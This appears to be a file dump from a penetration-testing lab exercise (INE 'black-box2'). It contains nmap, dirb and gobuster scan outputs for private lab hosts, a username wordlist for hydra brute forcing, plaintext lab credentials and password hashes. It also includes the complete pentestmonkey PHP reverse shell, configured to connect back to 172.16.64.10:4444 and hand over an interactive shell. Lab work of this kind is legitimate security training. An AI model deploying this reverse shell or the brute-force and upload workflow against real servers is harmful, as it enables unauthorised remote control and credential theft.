Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 74.30 ms 172.16.64.101
Nmap scan report for 172.16.64.140
Host is up (0.081s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: 404 HTML Template by Colorlib
MAC Address: 00:50:56:A2:ED:B9 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/24%OT=80%CT=1%CU=32277%PV=Y%DS=1%DC=D%G=Y%M=005056%T
OS:M=60369EA7%P=x86_64-pc-linux-gnu)SEQ(SP=F9%GCD=1%ISR=105%TI=Z%CI=I%II=I%
OS:TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O5
OS:=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=
OS:7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)
Uptime guess: 0.130 days (since Wed Feb 24 10:38:11 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=249 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE
HOP RTT ADDRESS
1 81.49 ms 172.16.64.140
Nmap scan report for 172.16.64.182
Host is up (0.067s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7f:b7:1c:3d:55:b3:9d:98:58:11:17:ef:cc:af:27:67 (RSA)
| 256 5f:b9:93:e2:ec:eb:f7:08:e4:bb:82:d0:df:b9:b1:56 (ECDSA)
|_ 256 db:1f:11:ad:59:c1:3f:0c:49:3d:b0:66:10:fa:57:21 (ED25519)
MAC Address: 00:50:56:A2:10:16 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/24%OT=22%CT=1%CU=30201%PV=Y%DS=1%DC=D%G=Y%M=005056%T
OS:M=60369EA8%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=104%TI=Z%CI=I%II=I
OS:%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O
OS:5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6
OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)
Uptime guess: 0.130 days (since Wed Feb 24 10:37:04 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 67.08 ms 172.16.64.182
Nmap scan report for 172.16.64.199
Host is up (0.072s latency).
Not shown: 65523 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: WIN10
| NetBIOS_Domain_Name: WIN10
| NetBIOS_Computer_Name: WIN10
| DNS_Domain_Name: WIN10
| DNS_Computer_Name: WIN10
|_ Product_Version: 10.0.10586
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2021-02-24T02:21:11
| Not valid after: 2051-02-24T02:21:11
| MD5: dae0 b306 70b0 42a9 60cc 8aa1 51d8 879e
|_SHA-1: c927 8194 b1bd 732d ec07 3f2d b2d0 6a04 ce01 e77d
|_ssl-date: 2021-02-24T18:46:09+00:00; +1m15s from scanner time.
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49943/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000
| ms-sql-ntlm-info:
| Target_Name: WIN10
| NetBIOS_Domain_Name: WIN10
| NetBIOS_Computer_Name: WIN10
| DNS_Domain_Name: WIN10
| DNS_Computer_Name: WIN10
|_ Product_Version: 10.0.10586
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2021-02-24T02:21:11
| Not valid after: 2051-02-24T02:21:11
| MD5: dae0 b306 70b0 42a9 60cc 8aa1 51d8 879e
|_SHA-1: c927 8194 b1bd 732d ec07 3f2d b2d0 6a04 ce01 e77d
|_ssl-date: 2021-02-24T18:46:09+00:00; +1m14s from scanner time.
MAC Address: 00:50:56:A2:AD:96 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/24%OT=135%CT=1%CU=30443%PV=Y%DS=1%DC=D%G=Y%M=005056%
OS:TM=60369EA8%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10C%TI=I%CI=I%II=
OS:I%SS=S%TS=A)OPS(O1=M4E7NW8ST11%O2=M4E7NW8ST11%O3=M4E7NW8NNT11%O4=M4E7NW8
OS:ST11%O5=M4E7NW8ST11%O6=M4E7ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2
OS:000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M4E7NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=
OS:80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3
OS:(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%
OS:F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y
OS:%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%R
OS:D=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)I
OS:E(R=Y%DFI=N%T=80%CD=Z)
Uptime guess: 0.134 days (since Wed Feb 24 10:32:02 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1m14s, deviation: 0s, median: 1m13s
| ms-sql-info:
| 172.16.64.199:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| nbstat: NetBIOS name: WIN10, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:a2:ad:96 (VMware)
| Names:
| WIN10<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
|_ WIN10<20> Flags: <unique><active>
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-24T18:46:04
|_ start_date: 2021-02-24T02:21:09
TRACEROUTE
HOP RTT ADDRESS
1 71.66 ms 172.16.64.199
Post-scan script results:
| ssh-hostkey: Possible duplicate hosts
| Key 256 db:1f:11:ad:59:c1:3f:0c:49:3d:b0:66:10:fa:57:21 (ED25519) used by:
| 172.16.64.101
| 172.16.64.182
| Key 256 5f:b9:93:e2:ec:eb:f7:08:e4:bb:82:d0:df:b9:b1:56 (ECDSA) used by:
| 172.16.64.101
| 172.16.64.182
| Key 2048 7f:b7:1c:3d:55:b3:9d:98:58:11:17:ef:cc:af:27:67 (RSA) used by:
| 172.16.64.101
|_ 172.16.64.182
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 24 13:44:56 2021 -- 4 IP addresses (4 hosts up) scanned in 202.49 seconds
================================================
FILE: ine-labs/black-box2/alive_hosts.txt
================================================
172.16.64.81
172.16.64.91
172.16.64.92
172.16.64.166
================================================
FILE: ine-labs/black-box2/dot166_DONE/dirb_scan.txt
================================================
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: dirb_scan.txt
START_TIME: Wed Feb 24 19:40:05 2021
URL_BASE: http://172.16.64.166:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://172.16.64.166:8080/ ----
==> DIRECTORY: http://172.16.64.166:8080/css/
==> DIRECTORY: http://172.16.64.166:8080/img/
+ http://172.16.64.166:8080/index.htm (CODE:200|SIZE:13098)
==> DIRECTORY: http://172.16.64.166:8080/js/
+ http://172.16.64.166:8080/server-status (CODE:403|SIZE:303)
---- Entering directory: http://172.16.64.166:8080/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.16.64.166:8080/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.16.64.166:8080/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Wed Feb 24 19:44:30 2021
DOWNLOADED: 4612 - FOUND: 2
================================================
FILE: ine-labs/black-box2/dot166_DONE/for_hydra.txt
================================================
Admin
Elizabeth
Elizabeth.Lopez
elizabeth
elizabeth.lopez
Tara
Tara.Backer
tara
tara.baker
Becky
Becky.Casey
becky
becky.casey
Randy
Randy.Carlson
randy
randy.carlson
Pablo
Pablo.Roberts
pablo
pablo.roberts
Bessie
Bessie.Hammond
bessie
bessie.hammond
Gerardo
Gerardo.Malone
gerardo
gerardo.malone
Sabrina
Sabrina.Summers
sabrina
sabrina.summers
================================================
FILE: ine-labs/black-box2/dot166_DONE/names.txt
================================================
Elizabeth Lopez
Tara Baker
Becky Casey
Randy Carlson
Pablo Roberts
Bessie Hammond
Gerardo Malone
Sabrina Summers
================================================
FILE: ine-labs/black-box2/dot81_DONE/dirb_scan.txt
================================================
----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: dirb_scan.txt
START_TIME: Wed Feb 24 18:54:17 2021
URL_BASE: http://172.16.64.81/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://172.16.64.81/ ----
==> DIRECTORY: http://172.16.64.81/default/
+ http://172.16.64.81/index.html (CODE:200|SIZE:11321)
+ http://172.16.64.81/server-status (CODE:403|SIZE:300)
==> DIRECTORY: http://172.16.64.81/webapp/
---- Entering directory: http://172.16.64.81/default/ ----
+ http://172.16.64.81/default/index.html (CODE:200|SIZE:11321)
---- Entering directory: http://172.16.64.81/webapp/ ----
==> DIRECTORY: http://172.16.64.81/webapp/assets/
==> DIRECTORY: http://172.16.64.81/webapp/css/
==> DIRECTORY: http://172.16.64.81/webapp/emails/
+ http://172.16.64.81/webapp/favicon.ico (CODE:200|SIZE:300757)
==> DIRECTORY: http://172.16.64.81/webapp/img/
==> DIRECTORY: http://172.16.64.81/webapp/includes/
+ http://172.16.64.81/webapp/index.php (CODE:200|SIZE:6359)
==> DIRECTORY: http://172.16.64.81/webapp/install/
==> DIRECTORY: http://172.16.64.81/webapp/lang/
+ http://172.16.64.81/webapp/robots.txt (CODE:200|SIZE:206)
==> DIRECTORY: http://172.16.64.81/webapp/templates/
==> DIRECTORY: http://172.16.64.81/webapp/upload/
---- Entering directory: http://172.16.64.81/webapp/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.16.64.81/webapp/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.16.64.81/webapp/emails/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.16.64.81/webapp/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.16.64.81/webapp/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.16.64.81/webapp/install/ ----
+ http://172.16.64.81/webapp/install/index.php (CODE:200|SIZE:3018)
---- Entering directory: http://172.16.64.81/webapp/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.16.64.81/webapp/templates/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.16.64.81/webapp/upload/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Wed Feb 24 19:16:07 2021
DOWNLOADED: 18448 - FOUND: 7
================================================
FILE: ine-labs/black-box2/dot81_DONE/users.bak
================================================
john1:password123
peter:youdonotguessthatone5
================================================
FILE: ine-labs/black-box2/dot91/dirb_scan.txt
================================================
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: dirb_scan.txt
START_TIME: Thu Feb 25 18:26:50 2021
URL_BASE: http://172.16.64.91:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://172.16.64.91:80/ ----
+ http://172.16.64.91:80/index.html (CODE:200|SIZE:11321)
+ http://172.16.64.91:80/server-status (CODE:403|SIZE:300)
-----------------
END_TIME: Thu Feb 25 18:38:30 2021
DOWNLOADED: 4612 - FOUND: 2
================================================
FILE: ine-labs/black-box2/dot91/gobuster_foocorp_scan.txt
================================================
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://75ajvxi36vchsv584es1.foocorp.io/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
=====================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/app (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
=====================================================
=====================================================
================================================
FILE: ine-labs/black-box2/dot91/gobuster_foocorp_scan2.txt
================================================
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://75ajvxi36vchsv584es1.foocorp.io/app/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
=====================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.php (Status: 200)
/js (Status: 301)
/upload (Status: 301)
=====================================================
=====================================================
================================================
FILE: ine-labs/black-box2/dot91/gobuster_scan.txt
================================================
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://172.16.64.91/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
=====================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/index.html (Status: 200)
/server-status (Status: 403)
=====================================================
=====================================================
================================================
FILE: ine-labs/black-box2/dot91/myapp.html
================================================
<html><body style="background: black; color: white;">
<center><div style="border: 1px yellow double">
<br /><br />
<form action="http://75ajvxi36vchsv584es1.foocorp.io/app/upload.php" method="post" enctype="multipart/form-data">
<br />Select file to upload:
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="Upload" name="submit">
</form>
<br /><br />
</div></center>
<hr /><br />
<center>© FooCORP 2021</center>
<body></html>
================================================
FILE: ine-labs/black-box2/dot91/php-reverse-shell.php
================================================
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '172.16.64.10'; // CHANGE THIS
$port = 4444; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
================================================
FILE: ine-labs/black-box2/dot92_DONE/dirb_scan.txt
================================================
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: dirb_scan.txt
START_TIME: Wed Feb 24 19:21:07 2021
URL_BASE: http://172.16.64.92/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://172.16.64.92/ ----
==> DIRECTORY: http://172.16.64.92/assets/
==> DIRECTORY: http://172.16.64.92/images/
+ http://172.16.64.92/index.html (CODE:200|SIZE:1393)
+ http://172.16.64.92/server-status (CODE:403|SIZE:300)
---- Entering directory: http://172.16.64.92/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://172.16.64.92/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Wed Feb 24 19:26:00 2021
DOWNLOADED: 4612 - FOUND: 2
================================================
FILE: ine-labs/black-box2/dot92_DONE/user-hashes.txt
================================================
c5d71f305bb017a66c5fa7fd66535b84
14d69ee186f8d9bbeddd4da31559ce0f
================================================
FILE: ine-labs/black-box2/thorough_nmap_scan.txt
================================================
# Nmap 7.91 scan initiated Wed Feb 24 18:44:11 2021 as: nmap -sV -n -T4 -Pn -p- -A -iL alive_hosts.txt -v --open -oN thorough_nmap_scan.txt
Nmap scan report for 172.16.64.81
Host is up (0.055s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 09:1e:bf:d0:44:0f:bc:c8:64:bd:ac:16:09:79:ca:a8 (RSA)
| 256 df:60:fc:fc:db:4b:be:b6:3e:7a:4e:84:4c:a1:57:7d (ECDSA)
|_ 256 ce:8c:fe:bd:76:77:8e:bd:c9:b8:8e:dc:66:b8:80:38 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
13306/tcp open mysql MySQL 5.7.25-0ubuntu0.16.04.2
| mysql-info:
| Protocol: 10
| Version: 5.7.25-0ubuntu0.16.04.2
| Thread ID: 7
| Capabilities flags: 63487
| Some Capabilities: ODBCClient, Support41Auth, SupportsLoadDataLocal, FoundRows, ConnectWithDatabase, LongPassword, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, Speaks41ProtocolOld, SupportsCompression, DontAllowDatabaseTableColumn, InteractiveClient, Speaks41ProtocolNew, LongColumnFlag, SupportsTransactions, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: +Y#V@\x1D4xj/2<\x17\x0D\x16\x02TEN0
|_ Auth Plugin Name: mysql_native_password
MAC Address: 00:50:56:A0:8B:2B (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/24%OT=22%CT=1%CU=31302%PV=Y%DS=1%DC=D%G=Y%M=005056%T
OS:M=6036E544%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10E%TI=Z%CI=I%II=I
OS:%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O
OS:5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6
OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)
Uptime guess: 0.003 days (since Wed Feb 24 18:42:27 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 54.73 ms 172.16.64.81
Nmap scan report for 172.16.64.91
Host is up (0.056s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
6379/tcp open redis Redis key-value store
MAC Address: 00:50:56:A0:8B:74 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/24%OT=80%CT=1%CU=44337%PV=Y%DS=1%DC=D%G=Y%M=005056%T
OS:M=6036E544%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10B%TI=Z%CI=I%II=I
OS:%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O
OS:5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6
OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)
Uptime guess: 0.005 days (since Wed Feb 24 18:38:19 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE
HOP RTT ADDRESS
1 55.56 ms 172.16.64.91
